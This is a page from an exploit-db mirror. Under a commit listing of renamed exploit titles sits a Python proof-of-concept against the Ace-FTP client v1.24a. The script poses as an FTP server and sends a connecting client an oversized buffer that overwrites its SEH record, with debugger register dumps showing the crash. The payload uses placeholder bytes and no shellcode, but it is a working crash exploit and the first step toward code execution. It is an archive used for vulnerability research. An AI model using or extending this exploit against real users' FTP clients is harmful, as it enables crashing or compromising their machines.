exploit-db-mirror/platforms/windows/dos/4058.py
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

121 lines
3.7 KiB
Python
Executable file

#!/usr/bin/python
#######################################################################
#Credit to n00b for finding the bug.
#Ace-Ftp client buffer over flow p0c.
#This is possible to exploit as we
#Smash the seh handlers and there are
#Plenty of registers that had our buffer
#Im still new to seh over writes I haven't
#Had much experience with the seh over write
#But get the Idea from what I've read about
#It..Any way this script creates a listening
#Socket and act's as a ftp server then when the
#Client connect's a huge buffer is sent back to
#The client.Resulting and a buffer overflow.
#If any one feel's like investigating or writing
#A poc for this please do so give some credits to
#n00b.I will give it a try during the week.
#######################################################################
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre
#######################################################################
#Tested:Win xp sp2.
#Version Affected: v1.24a.
###################################################
# \\Debug info//
###################################################
#Program received signal SIGSEGV,Segmentation fault.
#[Switching to thread 1312.0x714]
#0x00403c58 in ?? ()
#
#(gdb) i r
#
#eax 0x41414141 1094795585 <----Eax over written..
#ecx 0x0 0
#edx 0xa5b464 10859620
#ebx 0x41414141 1094795585 <----Ebx over written..
#esp 0x12e458 0x12e458
#ebp 0x12f48c 0x12f48c
#esi 0x12e488 1238152
#edi 0xa5b464 10859620
#eip 0x403c58 0x403c58
#eflags 0x10206 66054
#cs 0x1b 27
#ss 0x23 35
#ds 0x23 35
#es 0x23 35
#fs 0x3b 59
#gs 0x0 0
#fctrl 0xffff1272 -60814
#fstat 0xffff0000 -65536
#ftag 0xffffffff -1
#fiseg 0x0 0
#fioff 0x0 0
#foseg 0xffff0000 -65536
#fooff 0x0 0
###################################################
#What the register look like after crash..
###################################################
#EAX 41414141
#ECX 00000000
#EDX 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EBX 41414141
#ESP 0012E458
#EBP 0012F48C ASCII "AAAAAAAAAAAADDDDEEEECCCCCCC
#ESI 0012E488 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EIP 00403C58
###################################################
#DS:[41414141]=???
#EDX=00A5D930, (ASCII "AAAAAAAAAAAAAAAAAAAAAAAAA)
#MOV EDX,DWORD PTR DS:[EAX]
###################################################
#SEH chain of main thread
#Address SE handler
#---------------------------
#0012E46C AceXFTP.00430B9E
#45454545
#---------------------------
#0012F498 44444444 Pointer to next SEH record
#0012F49C 45454545 SE handler
#
#4112byte's to over write Pointer to next SEH record
#next 4 bytes over writes se handler.
###################################################
from socket import *
from struct import pack
host = "127.0.0.1 "
port = 21
Size_of_buf1 = 4112
Size_of_buf2 = 550
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\nPort %d open Waiting !!!! ..." % port
cl, addr = s.accept()
print "Vic is connected %s" % addr[0]
buf1 = "A" * Size_of_buf1
NEXT_SEH_RECORD = "\x44\x44\x44\x44"
SE_HANDLER = "\x45\x45\x45\x45"
buf2 = "C" * Size_of_buf2
End = "\r\n"
cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End)
print "mission accomplished : OK\n"
sleep(3)
cl.close()
s.close()
# milw0rm.com [2007-06-10]